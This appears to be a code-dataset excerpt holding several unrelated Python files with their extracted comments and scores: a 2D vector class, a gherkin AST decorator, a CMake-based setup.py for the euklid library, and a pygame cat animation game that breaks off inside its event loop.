    def __div__(this, r):
        if isinstance(r, Vector): return Vector(this.x / r.x, this.y / r.y)
        else: return Vector(this.x / r, this.y / r)

    __truediv__ = __div__  # Python 3 name of the division hook

    def __mul__(this, r):
        if isinstance(r, Vector): return Vector(this.x * r.x, this.y * r.y)
        else: return Vector(this.x * r, this.y * r)

    def __pow__(this, r):
        if isinstance(r, Vector): return Vector(this.x ** r.x, this.y ** r.y)
        else: return Vector(this.x ** r, this.y ** r)

    def __neg__(this): return Vector(-this.x, -this.y)

    def clone(this):
        """Returns a new vector with same coords as current"""
        return Vector(this.x, this.y)

    def __pos__(this):
        """'+this' : clones itself"""
        return this.clone()

    # --- magnitude ---
    @property
    def length(this): return math.sqrt(this.x**2 + this.y**2)

    def __abs__(this): return this.length

    def __len__(this):
        # len() must return an int; report the dimensionality (the original
        # returned the float magnitude, which Python 3 rejects).
        return 2

    @length.setter
    def length(this, m):
        size = this.length
        if size:  # only a non-null vector can be rescaled
            this.x *= float(m) / size
            this.y *= float(m) / size
        return this

    @property
    def int(this):
        """Returns new vector as current with integer coordinates"""
        return Vector(int(this.x), int(this.y))

    def tuple(this):
        """Returns current as a tuple"""
        return (this.x, this.y)

    def __invert__(this):
        # '~this' converts to a tuple (the original returned the bound
        # method object instead of calling it).
        return this.tuple()

    def __mod__(this, m):
        """'a % b': midpoint with another vector, or a copy resized to scalar b."""
        if isinstance(m, Vector): return (this + m) / 2.0
        else:  # scalar: same direction, new magnitude
            new = +this
            new.length = m
            return new

    @property
    def unit(this):
        """Returns unitary vector from current"""
        return this % 1

    @property
    def slope(this):
        """Gets vector slope from direction (None for a vertical vector)"""
        try: return this.y / this.x
        except ZeroDivisionError: return None

    @property
    def direction(this):
        """Gets current vector direction (radians)"""
        # atan2 handles vertical vectors and yields the true quadrant,
        # unlike the original atan(slope) which crashed for x == 0.
        return math.atan2(this.y, this.x)

    @direction.setter
    def direction(this, rad):
        """Sets the current vector direction to 'rad' (radians)"""
        length = this.length
        heading = Vector.createUnit(rad)
        this.x = heading.x * length
        this.y = heading.y * length

    @property
    def directionDeg(this):
        """Gets current vector direction (degrees)"""
        return math.degrees(this.direction)

    @staticmethod
    def createUnit(rad=0):
        """Static method returning some unit vector from a given direction 'rad' (radians)"""
        return Vector(math.cos(rad), math.sin(rad))

    @staticmethod
    def createUnitDeg(deg=0):
        """Static method returning some unit vector from a given direction 'deg' (degrees)"""
        return Vector.createUnit(math.radians(deg))

    def rotate(this, rad):
        """Returns a new vector being the current rotated by 'rad' (radians)"""
        # complex multiplication == 2D rotation
        z = complex(this.x, this.y)
        u = Vector.createUnit(rad)
        c = complex(u.x, u.y)
        new = z * c
        return Vector(new.real, new.imag)

    def rotateDeg(this, deg):
        """Returns a new vector being the current rotated by 'deg' (degrees)"""
        return this.rotate(math.radians(deg))

    def __bool__(this): return True  # a vector is always truthy

    __nonzero__ = __bool__  # Python 2 spelling, kept for compatibility
|
# -*- coding: utf-8 -*-
"""Custom weird vector, very useful."""
import numpy
import math
__all__ = [
'Vector',
]
# Plus simple pour gérer les points/vecteurs 2d
class Vector(object):
    """A simple 2D point/vector with arithmetic, polar and rotation helpers.

    NOTE(review): the original class could not run at all -- it subclassed
    ``numpy.array`` (a factory function, not a type), its ``__init__``
    referenced undefined names, and every method returned the undefined
    class ``D2Point`` (an old name of this class).  Those defects are fixed
    here; the Python-2-only hooks (``__div__``, ``__nonzero__``) are kept
    and aliased to their Python-3 equivalents.
    """

    # Coordinates are rounded to this many digits on read to hide
    # floating-point noise.
    ROUND = 14

    def __init__(this, x=0.0, y=0.0):
        """Build a vector from its two coordinates."""
        this.x = x
        this.y = y

    # --- coordinate accessors (stored as floats, read rounded) ---
    @property
    def x(this): return round(this.__X, this.ROUND)

    @property
    def y(this): return round(this.__Y, this.ROUND)

    @x.setter
    def x(this, value):
        r = this.__X = float(value)
        return r

    @y.setter
    def y(this, value):
        r = this.__Y = float(value)
        return r

    # --- representation ---
    def __str__(this):
        return '(%s, %s)[%s]' % (this.x, this.y, abs(this))

    def __repr__(this): return str(this)

    # --- arithmetic (a scalar operand is broadcast to both components) ---
    def __add__(this, p):
        if isinstance(p, Vector): return Vector(this.x + p.x, this.y + p.y)
        else: return Vector(this.x + p, this.y + p)

    def __sub__(this, p):
        if isinstance(p, Vector): return Vector(this.x - p.x, this.y - p.y)
        else: return Vector(this.x - p, this.y - p)

    def __div__(this, r):
        if isinstance(r, Vector): return Vector(this.x / r.x, this.y / r.y)
        else: return Vector(this.x / r, this.y / r)

    __truediv__ = __div__  # Python 3 name of the division hook

    def __mul__(this, r):
        if isinstance(r, Vector): return Vector(this.x * r.x, this.y * r.y)
        else: return Vector(this.x * r, this.y * r)

    def __pow__(this, r):
        if isinstance(r, Vector): return Vector(this.x ** r.x, this.y ** r.y)
        else: return Vector(this.x ** r, this.y ** r)

    def __neg__(this): return Vector(-this.x, -this.y)

    def clone(this):
        """Returns a new vector with same coords as current"""
        return Vector(this.x, this.y)

    def __pos__(this):
        """'+this' : clones itself"""
        return this.clone()

    # --- magnitude ---
    @property
    def length(this): return math.sqrt(this.x**2 + this.y**2)

    def __abs__(this): return this.length

    def __len__(this):
        # len() must return an int; report the dimensionality (the original
        # returned the float magnitude, which Python 3 rejects).
        return 2

    @length.setter
    def length(this, m):
        size = this.length
        if size:  # only a non-null vector can be rescaled
            this.x *= float(m) / size
            this.y *= float(m) / size
        return this

    @property
    def int(this):
        """Returns new vector as current with integer coordinates"""
        return Vector(int(this.x), int(this.y))

    def tuple(this):
        """Returns current as a tuple"""
        return (this.x, this.y)

    def __invert__(this):
        # '~this' converts to a tuple (the original returned the bound
        # method object instead of calling it).
        return this.tuple()

    def __mod__(this, m):
        """'a % b': midpoint with another vector, or a copy resized to scalar b."""
        if isinstance(m, Vector): return (this + m) / 2.0
        else:  # scalar: same direction, new magnitude
            new = +this
            new.length = m
            return new

    @property
    def unit(this):
        """Returns unitary vector from current"""
        return this % 1

    @property
    def slope(this):
        """Gets vector slope from direction (None for a vertical vector)"""
        try: return this.y / this.x
        except ZeroDivisionError: return None

    @property
    def direction(this):
        """Gets current vector direction (radians)"""
        # atan2 handles vertical vectors and yields the true quadrant,
        # unlike the original atan(slope) which crashed for x == 0.
        return math.atan2(this.y, this.x)

    @direction.setter
    def direction(this, rad):
        """Sets the current vector direction to 'rad' (radians)"""
        length = this.length
        heading = Vector.createUnit(rad)
        this.x = heading.x * length
        this.y = heading.y * length

    @property
    def directionDeg(this):
        """Gets current vector direction (degrees)"""
        return math.degrees(this.direction)

    @staticmethod
    def createUnit(rad=0):
        """Static method returning some unit vector from a given direction 'rad' (radians)"""
        return Vector(math.cos(rad), math.sin(rad))

    @staticmethod
    def createUnitDeg(deg=0):
        """Static method returning some unit vector from a given direction 'deg' (degrees)"""
        return Vector.createUnit(math.radians(deg))

    def rotate(this, rad):
        """Returns a new vector being the current rotated by 'rad' (radians)"""
        # complex multiplication == 2D rotation
        z = complex(this.x, this.y)
        u = Vector.createUnit(rad)
        c = complex(u.x, u.y)
        new = z * c
        return Vector(new.real, new.imag)

    def rotateDeg(this, deg):
        """Returns a new vector being the current rotated by 'deg' (degrees)"""
        return this.rotate(math.radians(deg))

    def __bool__(this): return True  # a vector is always truthy

    __nonzero__ = __bool__  # Python 2 spelling, kept for compatibility
|
en
| 0.480514
|
# -*- coding: utf-8 -*- Custom weird vector, very useful. # Plus simple pour gérer les points/vecteurs 2d Some custom vector # Valeur d'arrondi extrême # Init # Getters/Setters # ToString # Addition # Soustraction # Division # Multiplication # Puissance # Opposé Returns a new vector with same coords as current # Clone (+D2Point) '+this' : clones itself # Taille du vecteur # Module/Taille # Si le vecteur n'est pas nul # Partie entière Returns new vector as current with integer coordinates Returns current as a tuple # Conversion en tuple (~D2Point) # Modulation/moyenne (a % b) # Si c'est un réel # Vecteur unitaire Returns unitary vector from current # Pente/Direction Gets vector slope from direction # Direction (angle) Gets current vector direction (radians) # Changement de direction Sets the current vector direction to 'rad' (radians) # Easy Degrees Gets current vector direction (degrees) # Création de vecteurs unitaires Static method returning some unit vector from a given direction 'rad' (radians) # Easy Degrees Static method returning some unit vector from a given direction 'deg' (degrees) # Rotation du vecteur Returns a new vector being the current rotated by 'rad' (radians) # Easy Degrees Returns a new vector being the current rotated by 'deg' (degrees) # Réaction à "not this"
| 3.880875
| 4
|
reformat_gherkin/ast_node/_base.py
|
dcendents/reformat-gherkin
| 17
|
6628532
|
<reponame>dcendents/reformat-gherkin<filename>reformat_gherkin/ast_node/_base.py
from attr import dataclass
def prepare(cls=None, slots=True, frozen=True, eq=False):
"""
A common class decorator to decorate AST node classes. We can either use `@prepare`
with default parameters, or `@prepare(...)` to override the default values of the
parameters. By default, `eq=False` makes the objects hashable, and the hash is an
object's id. Therefore, every AST node is unique, even if they have identical
attributes (think of two identical rows or steps at two different places in a
document).
"""
wrapper = dataclass(slots=slots, frozen=frozen, eq=eq)
if cls is None:
return wrapper
return wrapper(cls)
|
from attr import dataclass
def prepare(cls=None, slots=True, frozen=True, eq=False):
"""
A common class decorator to decorate AST node classes. We can either use `@prepare`
with default parameters, or `@prepare(...)` to override the default values of the
parameters. By default, `eq=False` makes the objects hashable, and the hash is an
object's id. Therefore, every AST node is unique, even if they have identical
attributes (think of two identical rows or steps at two different places in a
document).
"""
wrapper = dataclass(slots=slots, frozen=frozen, eq=eq)
if cls is None:
return wrapper
return wrapper(cls)
|
en
| 0.764654
|
A common class decorator to decorate AST node classes. We can either use `@prepare` with default parameters, or `@prepare(...)` to override the default values of the parameters. By default, `eq=False` makes the objects hashable, and the hash is an object's id. Therefore, every AST node is unique, even if they have identical attributes (think of two identical rows or steps at two different places in a document).
| 3.159699
| 3
|
setup.py
|
airgproducts/euklid
| 0
|
6628533
|
#! /usr/bin/python
import logging
import os
import sys
import re
import platform
import subprocess
import multiprocessing
from distutils.version import LooseVersion
from distutils.core import setup
import setuptools
from setuptools.command.build_ext import build_ext
from setuptools.command.install_lib import install_lib
from setuptools.command.install import install
# Custom command-line switches for this build script; each is removed
# from sys.argv so setuptools does not see an unknown option.
DEBUG = False
if "--debug" in sys.argv:
    DEBUG = True
    sys.argv.remove("--debug")
CONDA_BUILD = False
if "--conda" in sys.argv:
    CONDA_BUILD = True
    sys.argv.remove("--conda")
class CMakeExtension(setuptools.Extension):
    """setuptools Extension whose sources are compiled by CMake.

    No source files are handed to setuptools; only the CMake source
    directory is recorded, and the build itself is delegated to the
    custom build_ext command.
    """
    def __init__(self, name, sourcedir=''):
        super().__init__(name, [])
        self.sourcedir = os.path.abspath(sourcedir)
        #self.include_dirs = ['euklid-stubs']
class InstallStubs(install_lib):
    """install_lib pass-through; kept as a hook for installing type stubs."""
    def run(self):
        super().run()
class CMakeBuild(build_ext):
    """build_ext command that delegates compilation to CMake.

    ``run`` verifies that a suitable CMake is installed and then builds
    every registered extension; ``build_extension`` configures the CMake
    project, runs the parallel build, and finally tries to generate type
    stubs (best effort).
    """
    def run(self):
        print("extensions: ", self.extensions)
        try:
            out = subprocess.check_output(['cmake', '--version'])
        except OSError:
            raise RuntimeError("CMake must be installed to build the following extensions: " +
                               ", ".join(e.name for e in self.extensions))
        if platform.system() == "Windows":
            cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
            if cmake_version < '3.1.0':
                raise RuntimeError("CMake >= 3.1.0 is required on Windows")
        for ext in self.extensions:
            self.build_extension(ext)

    def build_extension(self, ext):
        """Configure and build a single extension with CMake."""
        extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
        num_cores = multiprocessing.cpu_count()
        cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
                      '-DPYTHON_EXECUTABLE=' + sys.executable]
        cfg = 'Debug' if DEBUG else 'Release'
        cmake_args.append(f"-DCMAKE_BUILD_TYPE={cfg}")
        build_args = ['--config', cfg]
        if CONDA_BUILD:
            # BUGFIX: a missing comma used to fuse the last two entries
            # into the single bogus flag '-DBUILD_SHARED_LIBS=ON-G "Ninja"'.
            cmake_args += [
                "-DWALL=off",
                "-DUSE_SUBMODULE_LIBS=off",
                "-DBUILD_SHARED_LIBS=ON",
                "-GNinja",
            ]
        if platform.system() == "Windows":
            cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
            #if sys.maxsize > 2**32:
            #    cmake_args += ['-A', 'x64']
            if not CONDA_BUILD:
                # BUGFIX: '-m:N' is an MSBuild-only switch; it used to be
                # passed on every non-conda platform, including Linux.
                build_args += ['--', f'-m:{num_cores}']
        if CONDA_BUILD or platform.system() != "Windows":
            # Make/Ninja-style generators take '-jN' for parallel builds.
            # (The duplicate -DCMAKE_BUILD_TYPE append was removed; the
            # value is already set unconditionally above.)
            build_args += ['--', f'-j{num_cores}']
        env = os.environ.copy()
        env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''),
                                                              self.distribution.get_version())
        if not os.path.exists(self.build_temp):
            os.makedirs(self.build_temp)
        logging.info(f"Build dir: {self.build_temp}")
        logging.info("Cmake args: " + " ".join(cmake_args))
        logging.info("Build args: " + " ".join(build_args))
        subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
        subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
        # Generate .pyi stubs next to the built library (best effort).
        stubgen_path = self.build_lib
        if not os.path.exists(self.build_lib):
            stubgen_path = self.build_temp
        try:
            subprocess.check_call([sys.executable, 'stubs.py', stubgen_path])
        except subprocess.CalledProcessError:
            print("no mypy found")
version = "-"
with open("src/version.hpp") as version_file:
#print(version_file.read())
version = re.findall(r"version\s=\s['\"]([0-9\._]+)['\"]", version_file.read())[0]
with open("README.md") as readme_file:
long_description = readme_file.read()
setup(
name='euklid',
version=version,
description="common vector operations [2D/3D]",
ext_modules=[CMakeExtension('.')],
cmdclass={"build_ext": CMakeBuild, "install_lib": InstallStubs},
license='MIT',
long_description=long_description,
author='airgproducts',
url='http://github.com/airgproducts/euklid',
test_suite="tests.test_suite",
include_package_data=True
)
|
#! /usr/bin/python
import logging
import os
import sys
import re
import platform
import subprocess
import multiprocessing
from distutils.version import LooseVersion
from distutils.core import setup
import setuptools
from setuptools.command.build_ext import build_ext
from setuptools.command.install_lib import install_lib
from setuptools.command.install import install
DEBUG = False
if "--debug" in sys.argv:
DEBUG = True
sys.argv.remove("--debug")
CONDA_BUILD = False
if "--conda" in sys.argv:
CONDA_BUILD = True
sys.argv.remove("--conda")
class CMakeExtension(setuptools.Extension):
def __init__(self, name, sourcedir=''):
super().__init__(name, [])
self.sourcedir = os.path.abspath(sourcedir)
#self.include_dirs = ['euklid-stubs']
class InstallStubs(install_lib):
def run(self):
super().run()
class CMakeBuild(build_ext):
def run(self):
print("extensions: ", self.extensions)
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
num_cores = multiprocessing.cpu_count()
cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable]
cfg = 'Debug' if DEBUG else 'Release'
cmake_args.append(f"-DCMAKE_BUILD_TYPE={cfg}")
build_args = ['--config', cfg]
if CONDA_BUILD:
cmake_args += [
"-DWALL=off",
"-DUSE_SUBMODULE_LIBS=off",
"-DBUILD_SHARED_LIBS=ON"
'-G "Ninja"'
]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
#if sys.maxsize > 2**32:
# cmake_args += ['-A', 'x64']
if not CONDA_BUILD:
build_args += ['--', f'-m:{num_cores}']
if CONDA_BUILD or platform.system() != "Windows":
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', f'-j{num_cores}']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''),
self.distribution.get_version())
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
logging.info(f"Build dir: {self.build_temp}")
logging.info("Cmake args: " + " ".join(cmake_args))
logging.info("Build args: " + " ".join(build_args))
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
stubgen_path = self.build_lib
if not os.path.exists(self.build_lib):
stubgen_path = self.build_temp
try:
subprocess.check_call([sys.executable, 'stubs.py', stubgen_path])
except subprocess.CalledProcessError:
print("no mypy found")
version = "-"
with open("src/version.hpp") as version_file:
#print(version_file.read())
version = re.findall(r"version\s=\s['\"]([0-9\._]+)['\"]", version_file.read())[0]
with open("README.md") as readme_file:
long_description = readme_file.read()
setup(
name='euklid',
version=version,
description="common vector operations [2D/3D]",
ext_modules=[CMakeExtension('.')],
cmdclass={"build_ext": CMakeBuild, "install_lib": InstallStubs},
license='MIT',
long_description=long_description,
author='airgproducts',
url='http://github.com/airgproducts/euklid',
test_suite="tests.test_suite",
include_package_data=True
)
|
en
| 0.23328
|
#! /usr/bin/python #self.include_dirs = ['euklid-stubs'] #if sys.maxsize > 2**32: # cmake_args += ['-A', 'x64'] #print(version_file.read())
| 1.862448
| 2
|
cat.pyw
|
ovvladimir/Animation
| 2
|
6628534
|
<reponame>ovvladimir/Animation
import pygame
import os
import sys
import random
import ast
from colors import COLOR
def load_images(path) -> None:
    """Load every image file in *path* into the global ``images_list``.

    BUGFIX: the return annotation claimed ``list`` although nothing is
    returned (the function appends to the module-level ``images_list``),
    and ``os.listdir`` order is platform-dependent while later code
    indexes ``images_list`` positionally -- sorting by file name makes
    the load order deterministic.
    """
    for file_name in sorted(os.listdir(path)):
        images_list.append(pygame.image.load(path + os.sep + file_name))
def mask():
    """Rebuild the collision masks of every sprite in ``collideGroup``.

    The mask keeps only pixels close to the global ``collideColor`` (the
    ground color), so collisions happen against the drawn terrain rather
    than the sprite's full rectangle.
    """
    for sp in collideGroup:
        # collideColor = sp.image.get_at((30, 15))
        sp.mask = pygame.mask.from_threshold(sp.image, collideColor, (1, 1, 1, 255))
class Menu(pygame.sprite.Sprite):
    """Static help overlay listing the keyboard controls.

    Renders each help line onto one transparent surface sized to fit the
    longest string, anchored at the screen's top-left corner.
    """
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.text_list = [
            'space - somersault', 'm - menu', 'c - color selection',
            'z - -transparency', 'x - +transparency',
            '↓ - to lie', '↑ - jamp', '→ - go', '← - stop']
        self.text_pos = [10, 0]
        # Measure every line to size the backing surface to the widest one.
        self.width_string = []
        for string in self.text_list:
            self.width_string.append(text.size(string)[0])
        self.max_width_string = max(self.width_string)
        self.max_height_string = text.get_height() + text.get_descent()
        self.top = text.get_height() - text.get_ascent()
        self.image = pygame.Surface((
            self.text_pos[0] + self.max_width_string,
            self.text_pos[1] + self.top + len(self.text_list) * self.max_height_string),
            flags=pygame.SRCALPHA)
        # Blit the lines one under another onto the shared surface.
        for txt in self.text_list:
            self.text_render = text.render(txt, True, WHITE, None)
            self.image.blit(self.text_render, self.text_pos)
            self.text_pos[1] += self.max_height_string
        self.rect = self.image.get_rect(topleft=(0, 0))
class Earth(pygame.sprite.Sprite):
    """Scrolling ground tile; two instances alternate to cover the screen."""
    def __init__(self, x, y, img):
        pygame.sprite.Sprite.__init__(self)
        self.images = img
        self.index = 0
        self.range = len(self.images)
        self.image = self.images[self.index]
        self.rect = self.image.get_rect(topleft=(int(x), int(y)))
    def update(self):
        # Scroll left with the world; once fully off-screen, wrap to the
        # right edge with a randomly chosen tile variant.
        self.rect.x -= SPEED
        if self.rect.x <= -WIDTH_WIN:
            self.rect.x = WIDTH_WIN
            self.index = random.randrange(self.range)
            self.image = self.images[self.index]
            mask()  # collision masks must follow the new tile image
class Stars(pygame.sprite.Sprite):
    """One background star with random size, color, speed and position."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.speed = random.randint(1, 2)
        self.size = random.randint(1, 3)
        # Keep stars above the ground strip at the bottom of the screen.
        self.pos = random.randrange(WIDTH_WIN), random.randrange(HEIGHT_WIN - int(he * .7))
        self.image = pygame.Surface((self.size * 2, self.size * 2), pygame.SRCALPHA)
        pygame.draw.circle(self.image, pygame.Color(
            random.choice(COLOR[238:262])), [self.size, self.size], self.size)
        self.rect = self.image.get_rect(center=self.pos)
    def update(self):
        # Drift left; wrap around to the right edge when off-screen.
        self.rect.x -= self.speed
        if self.rect.right < 0:
            self.rect.left = WIDTH_WIN
class Bat(pygame.sprite.Sprite):
    """Flying bat that keeps turning to face the cat and 'breathes' by
    pulsing its zoom factor between 0.4 and 0.7."""
    def __init__(self, x, y, img):
        pygame.sprite.Sprite.__init__(self)
        self.images = img
        self.time = 0
        self.range = len(self.images)
        self.image = self.images[self.time]
        self.rect = self.image.get_rect(topleft=(x, y))
        self.direction = pygame.math.Vector2(self.rect.center)
        self.bat_zoom = .4
        self.zoom = 0
    def update(self):
        # Angle from the bat's anchor point towards the cat's position.
        bat_angle = self.direction.angle_to(cat.position - self.direction)
        self.images = [pygame.transform.rotozoom(
            image, 180 - bat_angle, self.bat_zoom) for image in images_bat]
        self.time += 0.2
        self.image = self.images[int(self.time % self.range)]
        self.rect = self.image.get_rect(center=self.rect.center)
        # Pulse the zoom: grow towards .7, then shrink back to .4.
        if self.zoom == 0:
            self.bat_zoom += .001
            if self.bat_zoom > .7:
                self.zoom = 1
        elif self.zoom == 1:
            self.bat_zoom -= .001
            if self.bat_zoom < .4:
                self.zoom = 0
class Bat2(pygame.sprite.Sprite):
    """Grounded bat collectible: drops onto the terrain, scrolls left and
    respawns off-screen to the right; touching it with the cat scores."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = images_list[3]
        # (min spawn x, max spawn x, ground y) for off-screen respawns.
        self.pos = (WIDTH_WIN * 1.4, WIDTH_WIN * 1.9, HEIGHT_WIN - he)
        self.rect = self.image.get_rect(
            bottomleft=(random.randint(self.pos[0], self.pos[1]), self.pos[2]))
        self.group = pygame.sprite.GroupSingle(self)
        self.vel = 0
        self.score = 0
    def gravi(self):
        # Gravity only applies once the sprite has scrolled onto screen;
        # the loop then lifts it back out of any terrain it sank into.
        self.vel += GRAVI if self.rect.left < WIDTH_WIN else 0
        self.rect.centery += self.vel
        while pygame.sprite.spritecollideany(
            self, collideGroup, pygame.sprite.collide_mask):
            self.rect.centery -= GRAVI
            self.vel = 0
    def update(self):
        self.gravi()
        self.rect.centerx -= SPEED * 2
        if self.rect.right < 0:
            self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
        # Cat touched the bat: respawn off-screen and count a point.
        if pygame.sprite.spritecollideany(
            cat, self.group, pygame.sprite.collide_circle_ratio(0.75)):
            self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
            self.score += 1
class Cat(pygame.sprite.Sprite):
    """The player sprite: run cycle, jumping, lying down and a somersault,
    with simple gravity resolved against the terrain collision masks."""
    def __init__(self, x, y, img):
        pygame.sprite.Sprite.__init__(self)
        self.images = img
        [self_image.set_colorkey((0, 0, 0)) for self_image in self.images]
        self.time = 0
        # Frame layout: frames [0:-4] are the run cycle; the last four are
        # special poses (jump up, jump down, lying, standing).
        self.range = len(self.images[:-4])
        self.range_jump_up = -4
        self.range_jump_down = -3
        self.range_down = -2
        self.range_stop = -1
        self.rot = 0
        self.image = self.images[self.time]
        self.rect = self.image.get_rect(center=(x, y))
        self.position = pygame.math.Vector2(self.rect.center)
        self.velocity = pygame.math.Vector2()
        self.velocity.x = SPEED
        self.width = self.image.get_width() // 2
    def flip(self):
        # Somersault: a small upward kick plus a full turn in 10-degree
        # steps; the flag is cleared when the rotation completes.
        self.velocity.y = -5
        if self.rot > -300:
            self.rot -= 10
        else:
            self.rot = 0
            somersault[0] = False
        self.images = [pygame.transform.rotate(image, self.rot) for image in images_cat]
    def animation(self):
        # Advance the run cycle, then override it with a special pose when
        # lying, jumping or standing still.
        self.time += dt
        self.image = self.images[int(self.time % self.range)]
        if down[0]:
            self.image = self.images[self.range_down]
        elif self.velocity.y < 0:
            self.image = self.images[self.range_jump_up]
        elif self.velocity.y > 4:
            self.image = self.images[self.range_jump_down]
        elif SPEED == 0:
            self.image = self.images[self.range_stop]
    def gravitation(self):
        # Constant downward acceleration integrated into the position.
        self.velocity.y += GRAVI
        self.position += self.velocity
    def antigravity(self):
        # pygame.sprite.collide_mask
        # Lift the cat back out of any terrain it sank into, then either
        # start a jump or resume the normal horizontal scroll speed.
        while pygame.sprite.spritecollideany(
            self, collideGroup, pygame.sprite.collide_rect_ratio(0.97)):
            self.position.y -= GRAVI
        self.velocity.y = 0
        self.rect.centery = int(self.position.y)
        if jump[0]:
            self.velocity.y = -15
            self.velocity.x = 3
        else:
            self.velocity.x = SPEED
    def update(self):
        if somersault[0]:
            self.flip()
        self.animation()
        self.image.set_alpha(alpha)  # image transparency (alpha)
        self.gravitation()
        # Wrap horizontally: leaving on the right re-enters on the left.
        if self.position.x > WIDTH_WIN + self.width:
            self.position.x = -self.width
        self.rect = self.image.get_rect(center=list(map(int, self.position)))
        self.antigravity()
'-----------------------------------------------------------------------------'
# --- window / pygame initialisation ---
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
WIDTH_WIN, HEIGHT_WIN = 960, 720
DAY_BG_COLOR, NIGHT_BG_COLOR = (100, 0, 255), (5, 0, 50)
screen = pygame.display.set_mode((WIDTH_WIN, HEIGHT_WIN))  # pygame.NOFRAME
pygame.mouse.set_visible(False)
text = pygame.font.SysFont('Arial', 22)
# A user event fires every 60 s to toggle day/night.
userevent = pygame.USEREVENT
pygame.time.set_timer(userevent, 60000)
# Event/key constants looked up by readable name.
key = {
    'type_quit': pygame.QUIT,
    'type_down': pygame.KEYDOWN,
    'type_up': pygame.KEYUP,
    'escape': pygame.K_ESCAPE,
    'up': pygame.K_UP,
    'space': pygame.K_SPACE,
    'down': pygame.K_DOWN,
    'right': pygame.K_RIGHT,
    'left': pygame.K_LEFT,
    'c': pygame.K_c,
    'z': pygame.K_z,
    'x': pygame.K_x,
    'm': pygame.K_m
}
FPS = 60
clock = pygame.time.Clock()
alpha = 255
# One-element lists act as mutable flags shared with the sprite classes.
jump = [False]
down = [False]
somersault = [False]
menu_on_off = [True, False]
day_night = [False, True]
WHITE = (255, 255, 255)
SPEED = 0
GRAVI = 1
NUMBER_OF_STARS = 150
COLOR_CAT = ['red', 'green', 'royal blue', 'orange', 'olive drab', 'sienna4']
# --- load sprite sheets and cut out the animation frames ---
images_list = []
load_images('Images')
images_list[1] = images_list[1].convert()  # convert so set_alpha (transparency) works
images_cat = []
images_bat = []
# texture.txt holds one dict literal per line mapping a sprite name to
# its sheet coordinates (X list, Y list, width list, height).
with open('texture.txt') as f:
    for lines in f:
        line = ast.literal_eval(lines)
        if 'cat' in line.keys():
            X, Y, W, h = line[str(*line.keys())].values()
            for n, w in enumerate(W):
                images_cat.append(images_list[1].subsurface((X[n], Y[n], w, h)))
        elif 'bat' in line.keys():
            X, Y, W, h = line[str(*line.keys())].values()
            for n, w in enumerate(W):
                images_bat.append(images_list[0].subsurface((X[n], Y[n], w, h)))
            height_bat = h
# The ground sheet contains four tile variants in a 2x2 grid.
we, he = images_list[2].get_width() // 2, images_list[2].get_height() // 2
images_earth = [
    images_list[2].subsurface((0, 0, we, he)),
    images_list[2].subsurface((we, 0, we, he)),
    images_list[2].subsurface((0, he, we, he)),
    images_list[2].subsurface((we, he, we, he))
]
# --- build the sprite world (layer 0 stars, 1 terrain, 2 UI/bat, 3 actors) ---
menu = Menu()
cat = Cat(WIDTH_WIN // 2, HEIGHT_WIN // 2, images_cat)
bat = Bat(WIDTH_WIN - height_bat, 0, images_bat)
bat2 = Bat2()
earth1 = Earth(0, HEIGHT_WIN - he, images_earth)
earth2 = Earth(WIDTH_WIN, HEIGHT_WIN - he, images_earth)
sprites = pygame.sprite.LayeredUpdates()
sprites.add(earth1, earth2, layer=1)
sprites.add(menu, layer=2)
sprites.add(bat, layer=2)
sprites.add(cat, bat2, layer=3)
collideGroup = pygame.sprite.Group(earth1, earth2)
# Stars are created once, then kept aside and re-added only at night.
for _ in range(NUMBER_OF_STARS):
    stars = Stars()
    sprites.add(stars, layer=0)
stars_list = sprites.remove_sprites_of_layer(0)
# Three floating platforms (plain colored surfaces) that scroll like terrain.
obj = [pygame.Surface((200, 20), pygame.SRCALPHA)]
obj[0].fill((200, 200, 20, 255))
objW, objH = obj[0].get_width(), obj[0].get_height()
for i in range(3):
    obj_sprite = Earth(WIDTH_WIN + objW * i, HEIGHT_WIN / 2.2 - objH * i * 3, obj)
    sprites.add(obj_sprite, layer=1)
    collideGroup.add(obj_sprite)
obj_sprite = sprites.get_sprites_from_layer(1)[-1]
collideColor = images_list[2].get_at((30, 30))
mask()
# --- main loop ---
run = True
while run:
    dt = clock.tick(FPS) / 150.
    for e in pygame.event.get():
        if e.type == key['type_quit']:
            run = False
        elif e.type == userevent:
            # Day/night toggle: show stars only at night.
            day_night.reverse()
            if day_night[0]:
                sprites.add(stars_list, layer=0)
            elif not day_night[0]:
                sprites.remove_sprites_of_layer(0)
        elif e.type == key['type_down']:
